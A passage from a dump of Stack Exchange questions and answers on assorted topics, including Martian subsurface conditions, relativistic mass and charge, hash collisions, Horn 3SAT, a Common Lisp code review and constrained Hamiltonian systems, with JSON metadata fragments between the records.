* (c) $k_\infty = 0.02 \frac{W}{m\cdot K}$ and
* (d) $k_\infty = 0.1 \frac{W}{m\cdot K}$.
The snapshots (gray lines) show the local heat flow. The area inside
the envelope (black lines) represents possible heat flow values that
can be obtained by a single measurement. The heat flows derived from
the annual mean temperatures are indicated by squares. Note that in
order to calculate heat flows, the thermal conductivity was assumed to
be known.
What we can see here is similar to the Earth:
there are significant temperature differences in the upper soil, depending on geographical position and on yearly and daily cycles
however, from around 4 m depth, the soil temperature is roughly constant.
Extrapolating the upper two graphs, we can expect a pleasant Earth-like temperature not very deep, roughly around 20-40 m.
However, according to this answer, Earth-like pressure occurs much deeper, around 20-40 km below the surface. That answer uses the Barometric formula to calculate the required depth, which is a very good estimation. Reaching it is probably beyond current technology, although not very far beyond it: the main problems with digging deep holes are
cooling
water incursions
The first is much easier to handle, and the second is non-existent on Mars.
Note that the Martian atmosphere is mainly carbon dioxide, so while spacesuits won't be needed, some oxygen tanks still will be.
There is no such depth where both the temperature and the pressure would be comfortable for us.
P.S. Actually, 16% pure oxygen is already enough for us to breathe, which reduces the required depth to around 10-15 km.
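As a numeric sketch of the barometric-formula estimates above: the surface pressure and scale height below are assumed round values (not figures from the linked answer), and the isothermal assumption makes the result only indicative - it is quite sensitive to the assumed temperature profile.

```python
import math

# Hedged barometric-formula sketch. P_SURFACE and SCALE_HEIGHT are
# assumed round values for Mars, not numbers taken from the answer above.
P_SURFACE = 610.0       # Pa, mean Martian surface pressure (assumed)
SCALE_HEIGHT = 11100.0  # m, Martian atmospheric scale height (assumed)

def depth_for_pressure(p_target_pa):
    """Depth below the mean surface where pressure reaches p_target_pa,
    using the isothermal barometric formula P(d) = P0 * exp(d / H)."""
    return SCALE_HEIGHT * math.log(p_target_pa / P_SURFACE)

print(f"1 atm:    {depth_for_pressure(101325.0) / 1000:.0f} km")
print(f"0.16 atm: {depth_for_pressure(0.16 * 101325.0) / 1000:.0f} km")
```

With these round numbers the depths come out somewhat larger than the 20-40 km and 10-15 km figures quoted above, but the qualitative point survives: the pressure depth is in the tens of kilometres, vastly exceeding the ~20-40 m needed for a comfortable temperature.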
"domain": "astronomy.stackexchange",
"id": 3112,
"tags": "planetary-atmosphere, mars, heat"
} |
Relativistic mass and relativistic charge | Question: Let a particle with a mass $m$ and a charge $q$ move with a speed $v$ close to the speed of light ($v\approx c$). Then, the special theory of relativity tells us the particle's relativistic mass would increase by a factor $\gamma = \frac{1}{\sqrt{1-(v/c)^2}}$. Nonetheless, the particle's charge would not be modified (at least that is what my Optics textbook, Óptica Electromagnética by Cabrera, states). This has me thinking: if an observer is located in an inertial frame of reference from where he can measure the speed of the particle, then said observer will also perceive that the particle's mass is greater. Why won't he perceive any alterations in the particle's charge?
Answer: The way we deal with electric charge in relativity is to introduce it as part of a complete set of ideas about electromagnetic fields and charged bodies. You are quite right that in this formulation the amount of electric charge on a given body is independent of the inertial frame in which the body may be being observed. We say it is 'invariant' or (to be clear) 'Lorentz invariant'. The word 'invariant' means the same, at any given event, no matter what inertial reference frame may be being adopted to define spatial and temporal coordinates.
Another important Lorentz invariant property of any particle is the rest mass $m$. In terms of this quantity, the momentum of a body moving at speed $v$ is
$$
p = \gamma m v. \tag{1}
$$
Our thinking is clearer if we regard $m$ as the important mass-related property here, not $(\gamma m)$. The equation setting out how the momentum relates to a vector force is
$$
{\bf f} = \frac{d{\bf p}}{dt} \tag{2}
$$
Hence
$$
{\bf f}
= \frac{d\gamma}{dt}m {\bf v} + \gamma \frac{dm}{dt}{\bf v} + \gamma m \frac{d{\bf v}}{dt}.
$$
For forces from electromagnetic fields the rest mass doesn't change as the particle accelerates, so this simplifies to
$$
{\bf f} = \frac{d\gamma}{dt}m {\bf v} + \gamma m \frac{d{\bf v}}{dt}.
$$
Notice that this is not $(\gamma m)$ times the acceleration.
I have mentioned this to give you some idea of why it is that it doesn't help much to gather the Lorentz factor and the rest mass together and call the combination by a name such as 'relativistic mass'. It's better to think of the situation as a given rest mass and then a momentum related to that by the formula (1). The important point is that the rest mass is the same in all inertial frames. That means that in order to find the momentum in any given frame you have to use the combination $\gamma v$ (which can depend on the frame) and multiply by the same $m$ no matter which frame it is.
Once you have settled that idea, you will also see that the ratio of charge to rest mass, for any given body, is the same in all inertial frames. When a body of given charge and rest mass is accelerated by an electric field, the charge and rest mass stay fixed while the momentum increases. The degree to which the momentum is sensitive to force is also fixed (see equation (2)). But as $\gamma$ gets larger the acceleration $d{\bf v}/dt$ gets smaller, for any given force. | {
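As a numerical illustration of equation (1), here is a short sketch. The $1/\gamma^3$ factor for the acceleration under a force parallel to the velocity is a standard result quoted here without derivation, and the electron mass and force value are just illustrative numbers.

```python
import math

C = 299_792_458.0  # speed of light, m/s

def gamma(v):
    """Lorentz factor for speed v."""
    return 1.0 / math.sqrt(1.0 - (v / C) ** 2)

def momentum(m, v):
    """Relativistic momentum, equation (1): p = gamma * m * v."""
    return gamma(v) * m * v

def accel_parallel(force, m, v):
    """dv/dt for a force parallel to v (standard 1/gamma^3 result)."""
    return force / (gamma(v) ** 3 * m)

m_e = 9.109e-31  # kg, electron rest mass (illustrative)
for frac in (0.1, 0.9, 0.99):
    v = frac * C
    print(f"v = {frac:.2f}c  gamma = {gamma(v):6.3f}  "
          f"p = {momentum(m_e, v):.3e} kg m/s  "
          f"dv/dt = {accel_parallel(1e-20, m_e, v):.3e} m/s^2")
```

The printout shows the same force producing ever smaller dv/dt as $\gamma$ grows, while the rest mass (and the charge-to-rest-mass ratio) entering the dynamics never changes.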
"domain": "physics.stackexchange",
"id": 100178,
"tags": "electromagnetism, special-relativity, charge, mass, inertial-frames"
} |
Why won't my door close in the winter? | Question: Please, take this question seriously, because this is a real problem to me. I have a door in my flat. A closet door, to be specific. And there is a problem with it.
In the summer everything is ok, the standard wood door opens and closes as predicted, but in the winter time it drives me crazy! It just won't close! Seems that it doesn't fit where it belongs. Damn door just doesn't allow me to welcome guests and take a cup of mulled wine with them.
So the question is, what physical processes are standing behind that unfitting? I believe that sun and gravity may be involved, but I don't really understand it. So, please, help. If I'll know the problem, I'll figure out a solution.
P.S Maybe it is important that I live in Kazan', Russia
Answer: I would say it has to do with humidity, since it is a wooden door. It probably gets too humid during the winter and the wood expands. If it had to do with temperature, it would be the opposite effect (it would expand during the summer when it is hot). | {
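A back-of-the-envelope sketch of this explanation: wood swells roughly linearly with its moisture content (MC). The coefficient and panel width below are assumed typical values, not measurements of the actual door, and whether the closet's air really is moister in winter depends on the flat's heating and ventilation.

```python
# Assumed tangential swelling coefficient: roughly 0.25% of width per
# 1 percentage point of moisture content (a typical textbook figure,
# not a property of this particular door).
TANGENTIAL_COEFF = 0.0025

def width_change_mm(width_mm, mc_change_percent):
    """Approximate width change of a wooden panel for a given MC change."""
    return width_mm * TANGENTIAL_COEFF * mc_change_percent

# A 600 mm panel gaining 4 percentage points of moisture:
print(f"Swell: {width_change_mm(600.0, 4.0):.1f} mm")
```

A few millimetres of swelling across a door's width is easily enough to make it bind in its frame.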
"domain": "physics.stackexchange",
"id": 14713,
"tags": "everyday-life"
} |
Hardware requirements for Linux server to run R & RStudio | Question: I want to build a home server/workstation to run my R projects. Based on what I have gathered, it should probably be Linux based. I want to buy the hardware now, but I am confused with the many available options for processors/ram/motherboards. I want to be able to use parallel processing, at least 64GB? of memory and enough storage space (~10TB?). Software wise, Ubuntu?, R, RStudio, PostgreSQL, some NOSQL database, probably Hadoop. I do a lot of text/geospatial/network analytics that are resource intensive. Budget ~$3000US.
My Questions:
What could an ideal configuration look like? (Hardware + Software)
What type of processor?
Notes:
No, I don't want to use a cloud solution.
I know it is a vague question, but any thoughts will help, please?
If it is off-topic or too vague, I will gladly delete.
Cheers B
Answer: There is no ideal configuration, for R or in general - product selection is always a difficult task and many factors are at play. I think that the solution is rather simple - get the best computer that your budget allows.
Having said that, since you want to focus on R development and one of R's pressing issues is its critical dependence on the amount of available physical memory (RAM), I would suggest favoring more RAM over other parameters. The second most important parameter, in my opinion, would be the number of cores (or processors - see details below), due to your potential multiprocessing focus. Finally, the two next most important criteria I'd pay attention to would be compatibility with Linux and system/manufacturer quality.
As far as storage goes, I suggest considering solid state drives (SSD) if you'd prefer a bit more speed over more space (however, if your work will involve intensive disk operations, you might want to investigate the issue of SSD reliability or consult with people knowledgeable in this matter). That said, I think that for R-focused work, disk operations are much less critical than memory ones, as I've mentioned above.
When choosing a specific Linux distribution, I suggest using a well-supported one, such as Debian or, even better, Ubuntu (if you care more about support, choose their LTS version). I'd rather not buy parts and assemble a custom box, but some people would definitely prefer that route - for that you really need to know hardware well, and potential compatibility could still be an issue. The next paragraph provides some examples for both commercial-off-the-shelf (COTS) and custom solutions.
Should you be interested in the custom system route, this discussion might be worth reading, as it contains some interesting pricing numbers (just to get an idea of potential savings) and also sheds some light on multiprocessor vs. multi-core alternatives (obviously, the context is different, but it could nevertheless be useful). As I said, I would go the COTS route, mainly due to reliability and compatibility issues. In terms of single-processor multi-core systems, your budget is more than enough. However, when we move to multiprocessor workstations (I'm not even talking about servers), even two-processor configurations can easily go over your budget. Some come close, such as the HP Z820 Workstation. It starts from 2439 USD, but in a minimal configuration. When you upgrade it to match your desired specs (if that's even possible), I'm sure we'll be talking about the 5K USD price range (extrapolating from the series' higher-level models). What I like about the HP Z820, though, is the fact that this system is Ubuntu certified. Considering system compatibility and assuming your desire to run Ubuntu, the best way to approach your problem is to go through Ubuntu-certified hardware lists and shortlist systems that you like. Just for the sake of completeness, take a look at this interesting multiprocessor system, which in a compatible configuration might cost less than one from HP or other major vendors. However, it's multimedia-oriented, its reliability and compatibility are unknown, and it's way over your specified budget.
In terms of R and R-focused software, I highly recommend using RStudio Server instead of RStudio, as that will give you the opportunity to work from any Internet-enabled location (provided your computer is running, obviously). Another piece of advice: keep an eye on alternative R distributions. I'm not talking about expensive commercial ones, but about emerging open source projects, such as pqR: http://www.pqr-project.org. Will update as needed. I hope this is helpful.
"domain": "datascience.stackexchange",
"id": 189,
"tags": "r"
} |
Question on particles | Question: Is there any theory in which every particle can be further subdivided into any number of particles, and the total number of particles anywhere in spacetime is in theory infinite, with only practical constraints limiting us to observing the currently known particles?
Also, could you please explain the nature of the two widely accepted theories that describe the small-scale and large-scale universe - QP and GR respectively - in the context of this question.
Answer: You may consider every excited state of an atom $\Psi_n$ as another particle. Then their number may be infinite even in this simple example. The higher energy of the system, the higher $n$.
In QFT each particle has occupation numbers. During reactions some occupation numbers decrease, some others increase. In fact, the QFT equations are balance equations governing the occupation numbers during interactions.
"domain": "physics.stackexchange",
"id": 364,
"tags": "mathematical-physics"
} |
Collisions in independent hashing | Question: Let $H$ be an $s$-wise independent family of hash functions from $\{1,\ldots,M\}$ to $\{1,\ldots,N\}$. It is easy to bound the probability of one collision, but are there good bounds for multiple collisions?
Answer: You can upper-bound your probability using a union bound. In particular,
$$\Pr[\exists x \in S . \phi(x)] \le \sum_{x \in S} \Pr[\phi(x)].$$
Using a union bound we obtain ${M^s \choose 2}$ terms in the sum, and each term is upper-bounded by $1/N^s$, so we find that your probability is at most
$${M^s \choose 2}/N^s.$$
If $M < \sqrt{N}$, then this probability will be at most $1/2$. If $M \gg \sqrt{N}$, then this probability is close to $1$.
(Qualitatively, this upper bound is fairly close to tight for a wide range of settings of $M,N$. I am not going to prove this fact, but you can take my word on it. So there's not much hope for a significantly better bound using some other proof technique.)
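A quick numeric check of the bound, with illustrative values of $M$, $N$, $s$ chosen here for demonstration (not taken from the question):

```python
from math import comb

def collision_bound(M, N, s):
    """Union-bound estimate (M^s choose 2) / N^s from the argument above."""
    return comb(M ** s, 2) / N ** s

# M below sqrt(N): the bound stays below 1/2.
print(collision_bound(30, 1000, 2))
# M well above sqrt(N): the bound exceeds 1 and is vacuous.
print(collision_bound(100, 1000, 2))
```

This mirrors the claim in the text: for $M < \sqrt{N}$ the bound is at most $1/2$, and for $M \gg \sqrt{N}$ it tells us nothing.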
In short: as Yuval Filmus says, unless $M$ is very small, your event is actually pretty likely.
No, something stronger than $s$-independence will not help. Even if you assume that $h$ is generated uniformly at random from the set of all hash functions with the right signature (something that is not actually implementable), you don't get a much better bound.
The only plausible approach I can see is to choose a hash function $h$ that does not have any collisions at all: e.g., choose $h$ from a family of injections, or use a perfect hash. Each of these has serious shortcomings: the former requires $M<N$, and the latter typically requires you to know in advance the full set of values that you will ever compute $h$ on. | {
"domain": "cs.stackexchange",
"id": 5060,
"tags": "computability, data-structures, probability-theory, hash, hash-tables"
} |
Computational Complexity of 'Generic'/'Relaxed' Horn 3SAT | Question: Horn 3SAT is 3SAT with at most one positive literal per clause, and it is in P. What about the complexity of the relaxed case of 2-Horn 3SAT, i.e.
Each clause is in CNF, has exactly 3 literals, with at most 2 positive literals.
Can someone please help with a reference?
Answer: Schaefer's dichotomy theorem gives you the answer. Apply it and see what you get, and let us know.
Looking at the modern formulation, in your case $\Gamma$ contains the three relations $\lnot x \lor \lnot y \lor \lnot z, x \lor \lnot y \lor \lnot z, x \lor y \lor \lnot z$. For each of these relations $R$, you have to go over the list of polymorphisms, and check whether one of them is a polymorphism of $R$. For example, to check whether the binary AND function is a polymorphism of $\lnot x \lor \lnot y \lor \lnot z$, you have to check whether
$$
(\lnot x_1 \lor \lnot y_1 \lor \lnot z_1) \land (\lnot x_2 \lor \lnot y_2 \lor \lnot z_2) \\ \Longrightarrow \lnot (x_1 \land x_2) \lor \lnot (y_1 \land y_2) \lor \lnot (z_1 \land z_2).
$$
If every $R \in \Gamma$ has one of the six polymorphisms, then your problem is in P. Otherwise, it's NP-complete. | {
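The polymorphism check described above can be carried out mechanically. Here is a hedged sketch (the helper names are mine, and only the binary AND check is shown - a full application of the theorem checks all six polymorphisms against every relation in $\Gamma$):

```python
from itertools import product

def sat_triples(clause):
    """All (x, y, z) in {0,1}^3 satisfying a clause given as a predicate."""
    return {t for t in product((0, 1), repeat=3) if clause(*t)}

def is_polymorphism(op, relation):
    """op is a polymorphism of relation R if applying op coordinate-wise
    to any two tuples of R yields a tuple that is again in R."""
    return all(tuple(op(a, b) for a, b in zip(t1, t2)) in relation
               for t1, t2 in product(relation, repeat=2))

AND = lambda a, b: a & b

# ~x | ~y | ~z : every triple except (1,1,1); closed under AND.
all_neg = sat_triples(lambda x, y, z: (not x) or (not y) or (not z))
print(is_polymorphism(AND, all_neg))

# x | y | ~z : (1,0,1) AND (0,1,1) = (0,0,1), which falsifies the clause.
two_pos = sat_triples(lambda x, y, z: x or y or (not z))
print(is_polymorphism(AND, two_pos))
```

As expected, the one-positive-literal (Horn) clause is closed under AND, while the two-positive-literal clause is not.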
"domain": "cs.stackexchange",
"id": 4483,
"tags": "complexity-theory"
} |
Texture-like measures for quantifying density of data in binary images | Question: Consider the following black-and-white image. It depicts a freehand sketch.
I wish to characterize the "density" of sketch strokes. For example, the hair strokes are densely grouped together, as are strokes near the wrists and the necklace stone. Other strokes are somewhat scattered and "far" apart, e.g. the nearly vertical strokes depicting the dress.
Is there a good measure (texture-like?) which can be used to quantify the above notion?
Answer: I ended up using the radon transform in 8 canonical directions. I then normalized the resulting distribution and computed its entropy. The numbers seem to correlate with the level of texture in the image.
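The exact pipeline isn't spelled out above, so here is a loose stdlib-only sketch of the idea: project the foreground pixels onto 8 directions (a poor man's Radon transform), pool the binned projections into one distribution, and take its entropy. The bin count, pooling choice, and toy "images" are my own arbitrary choices, not the answerer's actual implementation.

```python
import math

def projection_entropy(pixels, n_dirs=8, n_bins=16):
    """Entropy of pooled directional projections of foreground pixels.

    pixels: iterable of (x, y) coordinates of foreground pixels.
    """
    counts = []
    for k in range(n_dirs):
        theta = math.pi * k / n_dirs
        c, s = math.cos(theta), math.sin(theta)
        ts = [x * c + y * s for (x, y) in pixels]
        lo, hi = min(ts), max(ts)
        span = (hi - lo) or 1.0  # avoid division by zero for flat projections
        hist = [0] * n_bins
        for t in ts:
            hist[min(int((t - lo) / span * n_bins), n_bins - 1)] += 1
        counts.extend(hist)
    total = sum(counts)
    probs = [c / total for c in counts if c]
    return -sum(p * math.log(p) for p in probs)

dense = [(0, y) for y in range(32)]                       # one tight line
scattered = [(x, y) for x in range(8) for y in range(8)]  # spread blob
print(projection_entropy(dense), projection_entropy(scattered))
```

How the resulting entropy maps to "stroke density" depends on the binning and normalization details, so treat this only as a starting point for experimentation.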
"domain": "dsp.stackexchange",
"id": 2949,
"tags": "image-processing, filtering"
} |
Storing facts for logical questions | Question: I am writing a crude artificial intelligence program. I am happy with my program's ability to file away new words in ways that will allow logic to be done on them. Before I start expanding the logic abilities of the program I rewrote it in what I understand to be functional programming. I want a solid base before I move forward. Any critique or insight would be greatly appreciated because I believe in good programming. I have rewritten this to the point that I am cross-eyed, but at the moment it works.
Each word is stored in the global vocab list as an 'a' word. Some words are used as verbs or relationship words, stored in assoc arrays inside the 'a' words. 'C' words are the objects, which are placed in assoc arrays nested in the 'b' word arrays. The (unk) words are just placeholders until an actual word is placed in the array.
; This program is used on an SBCL REPL
; this program recieves three word phrases via the LEARN function
; and stores them in symbols aranged in nested assoc arrays
; so that logical questions can be asked using the function ASK.
; The LEARN function can take lists as arguments to proces many As Bs or Cs.
; the A word is the subject. The B word is the verb or relationship and the C is the object.
; For every ABC phrase the recipical phrase is also recorded.
; If the b word does not yet have a recipical a user prompt is given.
; Synonyms are also disambiguated to one tearm to allow abreviated input and to eliminate words meaning the same thing.
(setf *vocab* '()) ; all words live here
(defun with-branch (word) (cons word (cons (list '(unk) (cons '(unk) nil))nil)))
(setf sym '())
(defun learn (a b c) ;user friendly ersion of ABCphrase to input phrases
(ABCphrase a b c "none"))
(defun ABCphrase (a b c origin) ;computer uses to input three word phrases or lists or A B and C words to build many phrases at once
(cond
((listp a)
(loop for w in a do
(ABCphrase-b w b c origin))) ;origin is to keep track of what function called ABCphrase in ordert to prevent infite loops
((not (listp a))
(ABCphrase-b a b c origin))))
(defun ABCphrase-b (a b c origin)
(cond
((listp b) ;proceses the list if b is a list
(loop for y in b do
(ABCphrase-c a y c origin)))
((not (listp b))
(ABCphrase-c a b c origin))))
(defun ABCphrase-c ( a b c origin)
(cond
((listp c) ;proceses the list if c is list
(loop for z in c do
(add-and-place-ABCphrase-words a b z origin)))
((not (listp c))
(add-and-place-ABCphrase-words a b c origin)))) ;all words are eventualy processed throuf add-and-place-ABCphrase-words
(defun add-and-place-ABCphrase-words (a b c origin)
(add-to-vocab-if-not a)(add-to-vocab-if-not b)
(add-to-vocab-if-not c)
(let ((a-resolved (word-or-synonym a b "a" ))
(b-resolved (word-or-synonym b b "b" ))
(c-resolved (word-or-synonym c b "c" )))
(add-as-b-if-not a-resolved b-resolved c-resolved origin)
(cond
((equal b-resolved 'has-synonym) ;if b is has-synonym then don't resolve the synonym
(add-as-c-if-not a-resolved b-resolved c ))
((not(equal b-resolved 'has-synonym))
(add-as-c-if-not a-resolved b-resolved c-resolved )))))
(defun add-to-vocab-if-not (word)
(cond
((not(member word *vocab*)) ;if already exists
(push word *vocab*) ;add a as a a
(setf (symbol-value word) sym))))
(defun add-as-b-if-not (a b c origin) ;ads b to assoc array inside a (unless it is already there)
(cond
((not (assoc b (symbol-value a))); if not allready in lista
(cond
((equal (symbol-value a) sym)
(setf (symbol-value a) (cons (with-branch b) nil)) )
((not(equal (symbol-value a) sym))
(push (with-branch b) (symbol-value a))))))
(cond
((not(equal origin "recipical")) ;this condition prevents an infint loop of flip flopping recipicals
(process-recipical a b c))))
; b recipical
(defun process-recipical (a b c) ; create the backward phrase frog is-colored green green is-color-of frog
(cond
((equal b 'is-recipical-of) ;this condition was necessary due to an error
(ABCphrase c 'is-recipical-of a "recipical")
(return-from process-recipical b)
((not(assoc 'is-recipical-of (symbol-value b))) ; if b does not have repical then prompt user for recipical
(format t "Please type recipical of: ")
(princ b)
(finish-output)
(let ((rec-word (get-word a b c)))
(ABCphrase c rec-word a "recipical") ;creates the recipical phrase
(ABCphrase b 'is-recipical-of rec-word "recipical") ;create prase stating recipical
(ABCphrase rec-word 'is-recipical-of b "recipical"))) ;create recipical phrase stating recipical
((assoc 'is-recipical-of (symbol-value b)) ;if b has recipical
(ABCphrase c (first(first(first(cdr (assoc 'is-recipical-of (symbol-value b)))))) a "recipical"))) ))
(defun get-word (a b c)
(let ((word (read-from-string (read-line))))
(add-to-vocab-if-not word)
(return-from get-word word)))
(defun add-as-c-if-not (a b c)
(cond
((not (assoc c (car (cdr(assoc b (symbol-value a)))))); if not in list b
(push (with-branch c) (second(assoc b (symbol-value a)))))))
(defun word-or-synonym (word b place)
(cond
((equal place "b")
(return-from word-or-synonym (resolve-word word)))
((equal place "a")
(cond
((equal b 'is-synonym)
(return-from word-or-synonym word))
((not(equal b 'is-synonym))
(return-from word-or-synonym (resolve-word word)))))
((equal place "c")
(cond
((equal b 'has-synonym)
(return-from word-or-synonym word))
((not(equal b 'has-synonym))
(return-from word-or-synonym (resolve-word word)))))))
(defun resolve-word (word)
(cond
((assoc 'is-synonym (symbol-value word))
(return-from resolve-word (first(first(first(cdr (assoc 'is-synonym (symbol-value word)))))))))
(return-from resolve-word word))
(defun ask (a b c)
(add-to-vocab-if-not a)
(add-to-vocab-if-not b)
(add-to-vocab-if-not c)
(let ((a-resolved (word-or-synonym a b "a" ))
(b-resolved (word-or-synonym b b "b" ))
(c-resolved (word-or-synonym c b "c" )))
(assoc c-resolved (cadr(assoc b-resolved (symbol-value a-resolved))))))
(learn 'is-recipical-of 'is-recipical-of 'is-recipical-of)
(learn 'is-synonym 'is-recipical-of 'has-synonym)
(learn 'syn 'is-synonym 'is-synonym)
(learn 'rec 'syn 'is-recipical-of )
(learn 'teaches 'rec 'is-taught-by)
(learn 'is-located-in 'rec 'is-location-of)
(learn 'auburn 'is-location-of '(upstairs downstairs industrial-arts-building))
(learn 'loc-of 'syn 'is-location-of)
(learn 'loc-in 'syn 'is-located-in)
(learn 'upstairs 'loc-of '(CNT-room ISS-room APM-room testing-room fish-bowl TPP-room ISTEM))
Answer: Readability
It's hard to express how important this is - we write programs to be read by humans, and only at times by machines. Programming languages were designed by humans for humans, not for machines. And your responsibility is not only to write code that works (somehow), but most importantly to write code that is the clearest, simplest description of your intentions for other readers (and for your future self).
Naming
It's not a good idea to use names like a, b, c, etc. They don't tell the reader anything, and you had to describe their meanings in comments. Call them what they are, i.e.:
the A word is the subject. The B word is the verb or relationship and the C is the object.
Why not call them subject-word, verb-word and object-word?
Also, function names like ABCphrase, ABCphrase-b, ABCphrase-c are not very descriptive. Later you use some long, descriptive function names - why not here?
Formatting
Please make some space between function definitions.
Do not:
(defun get-word (a b c)
(let ((word (read-from-string (read-line))))
(add-to-vocab-if-not word)
(return-from get-word word)))
(defun add-as-c-if-not (a b c)
(cond
((not (assoc c (car (cdr(assoc b (symbol-value a)))))); if not in list b
(push (with-branch c) (second(assoc b (symbol-value a)))))))
(defun word-or-synonym (word b place)
Do:
(defun get-word (a b c)
(let ((word (read-from-string (read-line))))
(add-to-vocab-if-not word)
(return-from get-word word)))

(defun add-as-c-if-not (a b c)
(cond
((not (assoc c (car (cdr(assoc b (symbol-value a)))))); if not in list b
(push (with-branch c) (second(assoc b (symbol-value a)))))))

(defun word-or-synonym (word b place)
Don't put additional spaces in lists.
Do not:
(defun ABCphrase-c ( a b c origin)
Do:
(defun ABCphrase-c (a b c origin)
Do use at least one space (white character) between list elements.
Do not:
((not(member
Do:
((not (member
Indent your code properly. Wrong indentation in Common Lisp is like placing periods and commas in the wrong places in natural language: if you focus hard, you can still figure out what you are reading, but it leads to errors and is painful.
If you use an IDE created with Lisp requirements in mind (e.g. Emacs), it will indent your code properly, and every time you see your code not aligning properly, it's a clear sign there is something wrong with the expression.
Do not:
(let ((a-resolved (word-or-synonym a b "a" ))
(b-resolved (word-or-synonym b b "b" ))
(c-resolved (word-or-synonym c b "c" )))
(add-as-b-if-not a-resolved b-resolved c-resolved origin)
Do:
(let ((a-resolved (word-or-synonym a b "a" ))
      (b-resolved (word-or-synonym b b "b" ))
      (c-resolved (word-or-synonym c b "c" )))
  (add-as-b-if-not a-resolved b-resolved c-resolved origin)
Descriptions
You have a lot of comments, and that's good. However, in Common Lisp you can include them in your code and refer to them programmatically.
In a global function or variable definition you can add a string with a description. Later you can retrieve those descriptions using describe. So, for example, if you change the learn function to:
(defun learn (a b c)
"user friendly version of ABCphrase to input phrases."
(ABCphrase a b c "none"))
later you can ask for the description at the REPL:
(describe #'learn)
Same goes to global variable/parameter definitions.
Bottom-Up
When you define top-level functions first and lower-level functions later, you force the reader to jump from the top to random other parts. If I read the learn function, its body doesn't tell me much: it references another function that I haven't read yet. It would be easier to read if you placed simpler functions on top. So before you define learn, first define the function referenced by it, ABCphrase. And since ABCphrase references ABCphrase-b, define that first. And so on...
Tech
global vars
You can't setf something that doesn't exist! It's an error. Use defparameter or defvar instead. And always *mark* global variables properly.
Do not:
(setf *vocab* '()) ; all words live here
(setf sym '())
Do:
(defvar *vocab* '()
"all words live here.")
(defvar *sym* '())
return
In Common Lisp you don't have to use return-from the way return is required in other languages. A Common Lisp function returns the result of evaluating its last expression. As a rule of thumb: if you are about to write return-from, stop and think - you have probably overcomplicated something.
Do not:
(defun get-word (a b c)
(let ((word (read-from-string (read-line))))
(add-to-vocab-if-not word)
(return-from get-word word)))
Do:
(defun get-word (a b c)
(let ((word (read-from-string (read-line))))
(add-to-vocab-if-not word)
word))
Also if add-to-vocab-if-not returns word, you don't need the last line at all.
And do not:
(defun resolve-word (word)
(cond
((assoc 'is-synonym (symbol-value word))
(return-from resolve-word (first(first(first(cdr (assoc 'is-synonym (symbol-value word)))))))))
(return-from resolve-word word))
Do:
(defun resolve-word (word)
(cond
((assoc 'is-synonym (symbol-value word))
(first(first(first(cdr (assoc 'is-synonym (symbol-value word)))))))
(t word)))
first is good, car even better
At first glance, first looks and reads much better than car. But you can chain car and cdr nicely, so use (caar instead of (first (first, etc.:
(defun resolve-word (word)
(cond
((assoc 'is-synonym (symbol-value word))
(caaadr (assoc 'is-synonym (symbol-value word))))
(t word)))
when if cond
cond is, let's say, heavy. In many cases code reads better if you use if (when you need both branches, for true and false). And it is even better to use when (when you don't need the false branch) :)
(defun resolve-word (word)
(if (assoc 'is-synonym (symbol-value word))
(caaadr (assoc 'is-synonym (symbol-value word)))
word))
format
You mix format and princ - why? I can understand if you don't like format and prefer princ, etc., but be consistent.
equality
equal is only one of many equality checks. In your code it would be better to use eq or string= in many places.
functional programming
loops
The loop macro is for iterative programming, not for functional programming. In functional programming you use recursion. "The Little Schemer" is a great, practical read on the subject.
global vars
In essence, every time you call a function with the same parameters, it should return the same result. However, your functions use global variables very often, so their behaviour changes over time. That's not functional.
There are...
...a lot more problems with your code. But for a start, I hope my suggestions are helpful. Best of luck with your app!
"domain": "codereview.stackexchange",
"id": 29546,
"tags": "functional-programming, lisp"
} |
First class and second class constraints | Question: Hello I am working on a project that involves the constraints. I checkout the paper of Dirac about the constraints as well as some other resources. But still confuse about the first class and second class constraints.
Suppose, from the Lagrangian, I found two primary constraints $\Phi_a$ and $\Phi_b$.
Let $\dot\Phi_a$ and $\dot\Phi_b$ both leads to the secondary constraints $\Sigma_a$ and $\Sigma_b$ respectively.
From the consistency condition $\dot\Sigma_a$ leads to a tertiary constraints $\Theta_a$ but $\dot\Sigma_b$ become zero.
Now How can I check which one of them are first-class and which one of them are second-class?
Answer: (1) You have a set of irreducible constraints, $\lbrace \phi_j\rbrace$, both primary and secondary. This set of constraints defines a submanifold $M$ within the "full" (unconstrained) phase space.
(2) A function on the phase space is said to be weakly zero if it vanishes when restricted to the constrained submanifold $M$. A function is called strongly zero if its derivatives with respect to the unconstrained phase space coordinates are weakly zero. By definition the constraints are weakly zero, $\phi_j \approx 0$, but not necessarily strongly zero.
(3) A function $F$ defined on the full phase-space is called a first-class function if its Poisson brackets with all constraints vanish weakly. So $F$ is first class if
$$\lbrace F,\phi_j \rbrace \approx 0
$$
for all constraints $\phi_j$. A function is called second class if it's not first class, i.e. if it has one or more non-weakly vanishing Poisson brackets with the constraints.
(3') Just as a reminder: the derivatives in the Poisson bracket are calculated in the full phase space, i.e. the momenta and coordinates $(p,q)$ are treated as independent, such that you can calculate the derivatives $\delta F/\delta q$ and $\delta F / \delta p$. Then after this differentiation you apply the constraint equations to see if the Poisson bracket vanishes weakly.
(4) Then finally: a constraint is first class if all its Poisson brackets with the remaining constraints vanish weakly, and second class otherwise.
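As a minimal illustration (an added example, not part of the original answer): take a single degree of freedom with the two constraints $\phi_1 = q \approx 0$ and $\phi_2 = p \approx 0$. Their Poisson bracket is

```latex
\{\phi_1,\phi_2\}
  = \frac{\partial\phi_1}{\partial q}\,\frac{\partial\phi_2}{\partial p}
  - \frac{\partial\phi_1}{\partial p}\,\frac{\partial\phi_2}{\partial q}
  = 1 \not\approx 0 ,
```

a nonzero constant that cannot vanish even weakly, so both constraints are second class. By contrast, a single constraint $\phi = p \approx 0$ on its own would be first class, since $\{\phi,\phi\} = 0$.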
(5) Second-class constraints are not too difficult to deal with (e.g. when quantizing the system). First-class constraints form a much larger obstacle: they are the generators of gauge transformations.
I can highly recommend the book by Henneaux and Teitelboim.
"domain": "physics.stackexchange",
"id": 5755,
"tags": "gauge-theory, field-theory, hamiltonian-formalism, constrained-dynamics"
} |
Direction of magnetic field in a solenoid | Question: Using the right hand rule I struggle to visualise/work out how to tell which is the north and south pole.
It's also confusing that the right-hand rule refers to conventional current, not electron flow, so when looking at diagrams this adds to the problem.
What is an easy way of finding the north and south poles of a solenoid?
